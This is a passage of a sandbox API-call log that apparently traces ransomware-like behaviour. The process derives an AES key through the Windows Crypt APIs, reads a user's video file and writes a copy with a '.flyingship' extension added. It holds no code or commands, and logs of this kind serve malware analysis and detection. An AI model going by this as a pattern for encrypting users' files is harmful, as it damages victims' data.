wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.898] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.898] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.898] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.898] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.898] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.899] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.899] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.899] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.899] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.899] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.931] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.931] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.931] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.931] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.931] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.931] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.932] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0198.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.932] CryptDestroyHash (hHash=0x90af58) returned 1 [0198.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\5sge4.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.934] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.934] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.934] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.934] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.934] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0198.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.936] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0198.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\5sge4.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.940] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.940] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xf9ea, lpOverlapped=0x0) returned 1 [0198.943] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xbea018 [0198.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0198.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xbf9a10 